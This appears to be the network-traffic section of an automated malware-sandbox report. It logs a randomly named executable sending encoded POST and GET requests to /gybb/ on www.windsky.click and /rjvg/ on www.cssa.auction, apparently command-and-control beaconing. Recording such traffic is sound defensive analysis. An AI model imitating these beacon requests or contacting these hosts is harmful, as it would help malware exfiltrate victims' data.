                                                                            Data Ascii: em)/ 25.625)}}@supports (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:clamp(.875rem ,.7286585366rem + .7317073171vw ,1.0625rem)}}@supports not (font-size:clamp(0.875rem ,0.7286585366rem +
                                                                            Nov 24, 2024 08:23:14.280742884 CET1236INData Raw: 6d 70 28 30 2e 37 35 72 65 6d 20 2c 30 2e 36 35 32 34 33 39 30 32 34 34 72 65 6d 20 2b 20 30 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 30 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67
                                                                            Data Ascii: mp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:calc(.75rem + .125*(100vw - 20rem)/ 25.625)}}@supports (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window
                                                                            Nov 24, 2024 08:23:14.280750036 CET1236INData Raw: 3d 22 35 30 2e 36 31 31 32 22 20 63 79 3d 22 36 30 2e 33 39 39 36 22 20 72 78 3d 22 35 30 2e 36 31 31 32 22 20 72 79 3d 22 36 30 2e 33 39 39 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 2d 30 2e 39 31 36 33 36 36 20 30 2e 34 30
                                                                            Data Ascii: ="50.6112" cy="60.3996" rx="50.6112" ry="60.3996" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 316.613 398.839)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter2_f_2001_5)"><path d="M262.896 422.214C3
                                                                            Nov 24, 2024 08:23:14.280829906 CET1236INData Raw: 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 37 35 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09
                                                                            Data Ascii: lur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.2946" y="36.0856" width="514.378" height="571.162" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
                                                                            Nov 24, 2024 08:23:14.280838966 CET1236INData Raw: 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 62 2e 66 61 73 74 70 61 6e 65 6c 2e 64 69 72 65 63 74 2f 74 72 6f 75 62 6c 65 73 68 6f 6f 74 2f 22 20 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 6c 69 6e 6b 20 5f 6c 69 6e
                                                                            Data Ascii: <a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more possible reasons</a></div><svg class="svg-two" width="731" height="830" viewBox="0 0 731 830" fill="none" xmlns="http://www.w3.org/2000/
                                                                            Nov 24, 2024 08:23:14.284806013 CET500INData Raw: 72 20 69 64 3d 22 66 69 6c 74 65 72 31 5f 66 5f 32 30 30 31 5f 31 30 22 20 78 3d 22 32 37 2e 32 36 35 37 22 20 79 3d 22 30 2e 32 32 35 30 33 37 22 20 77 69 64 74 68 3d 22 37 30 33 2e 32 36 31 22 20 68 65 69 67 68 74 3d 22 38 32 39 2e 35 32 22 20
                                                                            Data Ascii: r id="filter1_f_2001_10" x="27.2657" y="0.225037" width="703.261" height="829.52" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.105000246.253.5.221804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:19.835752010 CET685OUTPOST /gybb/ HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.windsky.click
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.windsky.click/gybb/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4d 59 31 58 6d 6c 38 57 31 31 30 69 6b 47 39 69 59 74 2b 6c 53 4d 74 36 43 33 74 39 74 46 66 4a 55 7a 6d 7a 41 52 4c 30 48 78 34 48 4c 2b 4f 69 5a 43 76 50 71 69 52 30 73 58 35 7a 38 4a 73 4b 4a 49 48 55 32 58 73 64 31 66 6b 43 58 6e 64 55 71 49 61 53 6f 37 58 65 6b 79 56 59 66 6d 72 38 55 32 74 6b 4a 33 4e 50 4a 78 77 43 37 4b 61 4a 51 54 6a 2f 79 72 52 56 4f 33 44 36 4f 64 5a 61 41 58 4d 33 2f 73 61 46 4c 68 38 45 48 54 6b 72 42 63 4c 47 44 43 76 4c 52 4b 33 55 36 5a 53 4a 74 59 6a 66 52 6b 4e 6f 4e 69 49 75 41 63 2f 37
                                                                            Data Ascii: GX6Lp2F=sCcUsF5VlWhXMY1Xml8W110ikG9iYt+lSMt6C3t9tFfJUzmzARL0Hx4HL+OiZCvPqiR0sX5z8JsKJIHU2Xsd1fkCXndUqIaSo7XekyVYfmr8U2tkJ3NPJxwC7KaJQTj/yrRVO3D6OdZaAXM3/saFLh8EHTkrBcLGDCvLRK3U6ZSJtYjfRkNoNiIuAc/7


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.105000346.253.5.221804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:22.504612923 CET709OUTPOST /gybb/ HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.windsky.click
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.windsky.click/gybb/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4e 38 4a 58 67 47 55 57 30 56 30 6c 6e 47 39 69 53 4e 2b 70 53 4d 70 36 43 79 4e 74 75 32 72 4a 52 6d 43 7a 42 53 54 30 4c 52 34 48 54 75 4f 6e 58 69 76 55 71 69 64 43 73 57 31 7a 38 4a 34 4b 4a 49 33 55 31 6d 73 65 36 76 6b 4d 62 48 64 57 33 59 61 53 6f 37 58 65 6b 32 39 6d 66 6d 7a 38 55 44 39 6b 4b 57 4e 49 57 42 77 64 38 4b 61 4a 47 6a 6a 7a 79 72 52 33 4f 79 72 41 4f 66 52 61 41 53 77 33 78 64 61 45 43 68 38 43 4b 7a 6c 70 46 2f 36 72 50 44 2f 78 57 6f 71 59 76 70 53 54 71 35 65 59 41 31 73 2f 65 56 55 67 4f 61 4b 52 61 67 68 4c 6f 77 6e 6d 71 65 53 74 47 38 43 6e 6f 34 51 67 4c 41 3d 3d
                                                                            Data Ascii: GX6Lp2F=sCcUsF5VlWhXN8JXgGUW0V0lnG9iSN+pSMp6CyNtu2rJRmCzBST0LR4HTuOnXivUqidCsW1z8J4KJI3U1mse6vkMbHdW3YaSo7Xek29mfmz8UD9kKWNIWBwd8KaJGjjzyrR3OyrAOfRaASw3xdaECh8CKzlpF/6rPD/xWoqYvpSTq5eYA1s/eVUgOaKRaghLownmqeStG8Cno4QgLA==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.105000446.253.5.221804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:25.180537939 CET1722OUTPOST /gybb/ HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.windsky.click
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.windsky.click/gybb/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4e 38 4a 58 67 47 55 57 30 56 30 6c 6e 47 39 69 53 4e 2b 70 53 4d 70 36 43 79 4e 74 75 32 7a 4a 52 31 36 7a 42 79 76 30 49 52 34 48 66 4f 4f 6d 58 69 75 45 71 69 31 65 73 57 4a 46 38 4c 41 4b 49 72 2f 55 2b 30 55 65 74 66 6b 4d 47 58 64 4c 71 49 62 59 6f 37 48 43 6b 79 68 6d 66 6d 7a 38 55 45 46 6b 63 33 4e 49 4e 42 77 43 37 4b 61 2f 51 54 6a 66 79 6f 67 56 4f 79 6d 69 4a 72 64 61 44 7a 41 33 7a 76 79 45 4e 68 38 41 47 54 6c 4c 46 2f 32 6f 50 48 66 58 57 70 66 33 76 72 43 54 70 6f 2b 46 58 47 46 6c 43 31 63 6c 43 71 4b 56 53 6e 64 50 6c 7a 69 5a 68 76 65 4a 64 66 62 6e 6c 73 39 75 52 42 2b 77 54 34 45 50 70 47 6e 39 73 76 6e 39 6f 6f 61 46 38 6e 49 50 73 75 6d 31 77 56 41 75 6a 4d 43 36 7a 39 68 31 33 49 56 52 48 68 78 68 51 36 69 55 47 61 74 46 73 66 55 47 50 53 5a 56 4f 36 4f 79 41 69 36 66 44 77 76 4f 71 66 4a 76 31 6d 62 37 6a 32 67 59 62 4e 53 45 33 4d 64 6a 58 56 49 49 74 6a 70 31 71 78 71 59 75 43 48 37 4b 4b 73 32 71 46 35 57 4a 6f [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=sCcUsF5VlWhXN8JXgGUW0V0lnG9iSN+pSMp6CyNtu2zJR16zByv0IR4HfOOmXiuEqi1esWJF8LAKIr/U+0UetfkMGXdLqIbYo7HCkyhmfmz8UEFkc3NINBwC7Ka/QTjfyogVOymiJrdaDzA3zvyENh8AGTlLF/2oPHfXWpf3vrCTpo+FXGFlC1clCqKVSndPlziZhveJdfbnls9uRB+wT4EPpGn9svn9ooaF8nIPsum1wVAujMC6z9h13IVRHhxhQ6iUGatFsfUGPSZVO6OyAi6fDwvOqfJv1mb7j2gYbNSE3MdjXVIItjp1qxqYuCH7KKs2qF5WJoaVp0ST+QHFuNP537UZR2sQaaLdAPCkvf5wFTeme1MJvIv6C6sFC9laPIxRzRz6JK9RnXs3GULKE4Fo7EITUZrFc3OKiX++DmjKkSGFtEVNv9ccP9Jo/C0y4+qJqBEmp4NWZV3LjQln3kNxLHp0srBy9QIcDOOtxnbKr3jqjCDArIy+8OFYleBPdPSpcfRalESGdmIq4jUw7bAbySqJ+htySylbxvRb2UCf/Ixq1LAIheWVRLigdO+5SbF7QrU1FndU9vm05xyNNUb/+4jRFGERp23yqJkyY2wCEPeTZRo2XWvVOLBr70lOrnIAZG/InF3SJlU9WkLprRB7gAuGgSk4En0dCVlsbA0SaiS5wTZcmsN2tH3uJza+afkyfdhMajELb37uEXeXneNJSInUgpLFkDynGRo/wt/D8Fe5+5uBjhKomoS8S9H2WQnwznbx8lOY0493Hq0ZJ+eN/Cov7gOQhwqOICe8iaKWRYmyfPtCX8UCi+FyNzzo/t6nuYv4frek16SJ7cb1DsjhFg54feAcszRvUEdujtom91Ngvj9BIThCc6yXHeQjpl35GQi05DYPf/DDGYAJmm4jkvzrc34xFyQqf++e4neQxA3BT4S+TK5JUE0KfN6bFrfPrMXA8hEbsxxgcwUjFqBw3w9nPKqheVAnZyeyfsWu [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.105000546.253.5.221804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:27.841658115 CET423OUTGET /gybb/?H8=BpFD-28hKhrD&GX6Lp2F=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4PgAZipsqs/kn6LZvixDWxXnWnZkIg== HTTP/1.1
                                                                            Host: www.windsky.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.1050006107.167.84.42804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:55.380878925 CET682OUTPOST /rjvg/ HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.cssa.auction
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.cssa.auction/rjvg/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 45 36 31 67 48 44 35 33 64 49 74 4a 48 4e 61 45 43 37 76 6c 35 74 78 4d 6e 68 31 79 74 4e 39 56 42 75 68 54 6c 39 47 7a 55 43 59 33 4e 58 6f 33 2b 39 36 68 4f 51 38 6e 32 71 58 76 31 68 30 6c 30 72 41 78 56 30 34 4a 43 44 61 4a 6f 31 6c 2f 33 53 71 58 49 48 66 70 77 64 45 2b 54 2f 4f 74 78 62 74 53 7a 34 71 33 67 6c 51 32 6a 6e 72 4d 38 64 4f 72 58 32 77 43 37 4b 39 4a 4a 63 74 58 72 68 47 39 48 4f 35 66 35 5a 43 67 6c 4a 62 45 51 69 39 44 54 42 48 6c 39 5a 62 71 42 68 48 38 4f 70 56 64 71 45 6a 68 49 47 4a 36 71 61 5a 50
                                                                            Data Ascii: GX6Lp2F=gWg0hdzfwUNWE61gHD53dItJHNaEC7vl5txMnh1ytN9VBuhTl9GzUCY3NXo3+96hOQ8n2qXv1h0l0rAxV04JCDaJo1l/3SqXIHfpwdE+T/OtxbtSz4q3glQ2jnrM8dOrX2wC7K9JJctXrhG9HO5f5ZCglJbEQi9DTBHl9ZbqBhH8OpVdqEjhIGJ6qaZP
                                                                            Nov 24, 2024 08:23:56.661752939 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:23:56 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:23:56.661817074 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.1050007107.167.84.42804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:58.050436974 CET706OUTPOST /rjvg/ HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.cssa.auction
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.cssa.auction/rjvg/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 46 62 46 67 55 77 68 33 61 6f 74 4f 62 64 61 45 62 72 75 75 35 74 39 4d 6e 67 78 69 73 2f 5a 56 47 4d 70 54 33 50 75 7a 58 43 59 33 46 33 6f 79 36 39 36 6d 4f 51 78 53 32 76 33 76 31 67 51 6c 30 75 45 78 56 48 51 4b 44 54 61 4c 6e 56 6c 39 34 79 71 58 49 48 66 70 77 63 6b 51 54 2f 57 74 32 76 70 53 78 5a 71 34 6d 56 51 35 7a 33 72 4d 34 64 4f 56 58 32 77 38 37 49 4a 76 4a 66 56 58 72 6b 69 39 48 61 74 63 77 5a 43 69 71 70 61 39 52 43 67 55 4c 69 72 74 39 37 62 53 41 58 48 65 4e 49 6f 61 37 56 43 32 62 78 56 30 6b 63 73 6c 70 38 37 4a 62 6b 34 53 79 31 6e 36 45 4b 35 77 66 4d 7a 71 64 67 3d 3d
                                                                            Data Ascii: GX6Lp2F=gWg0hdzfwUNWFbFgUwh3aotObdaEbruu5t9Mngxis/ZVGMpT3PuzXCY3F3oy696mOQxS2v3v1gQl0uExVHQKDTaLnVl94yqXIHfpwckQT/Wt2vpSxZq4mVQ5z3rM4dOVX2w87IJvJfVXrki9HatcwZCiqpa9RCgULirt97bSAXHeNIoa7VC2bxV0kcslp87Jbk4Sy1n6EK5wfMzqdg==
                                                                            Nov 24, 2024 08:23:59.292924881 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:23:59 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:23:59.292967081 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.1050008107.167.84.42804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:00.710191965 CET1719OUTPOST /rjvg/ HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.cssa.auction
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.cssa.auction/rjvg/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 46 62 46 67 55 77 68 33 61 6f 74 4f 62 64 61 45 62 72 75 75 35 74 39 4d 6e 67 78 69 73 2f 52 56 42 35 39 54 6d 59 61 7a 57 43 59 33 45 33 6f 7a 36 39 37 6a 4f 51 70 57 32 76 79 55 31 6a 34 6c 32 4d 4d 78 65 57 51 4b 4b 54 61 4c 69 6c 6c 38 33 53 72 4e 49 48 50 74 77 63 55 51 54 2f 57 74 32 70 46 53 32 49 71 34 6b 56 51 32 6a 6e 72 59 38 64 50 34 58 32 59 4b 37 4c 6c 5a 4a 76 31 58 72 45 79 39 45 76 35 63 79 35 43 61 70 70 61 4d 52 43 74 54 4c 69 6d 57 39 36 2f 30 41 51 7a 65 64 4e 5a 6b 67 30 4b 73 4f 54 63 68 6a 75 34 53 36 63 76 57 43 6b 39 77 36 57 44 6e 58 70 34 6b 66 65 47 54 4e 2b 66 43 62 71 35 35 70 6e 38 48 2b 75 62 33 31 53 31 2b 47 58 51 68 6e 76 6f 56 33 79 67 4b 44 57 62 75 77 4f 4d 64 78 68 71 39 44 41 66 51 45 6f 4d 6a 7a 4f 63 6a 74 46 46 4e 4d 43 4c 6a 31 4b 34 66 68 47 33 4c 4a 32 67 38 38 59 6d 68 32 76 6a 4d 70 47 52 53 6e 6e 70 6f 45 65 49 68 2f 71 33 31 72 31 4c 74 64 4c 74 33 65 62 4d 67 4d 32 6d 51 48 61 2b 79 65 34 [TRUNCATED]
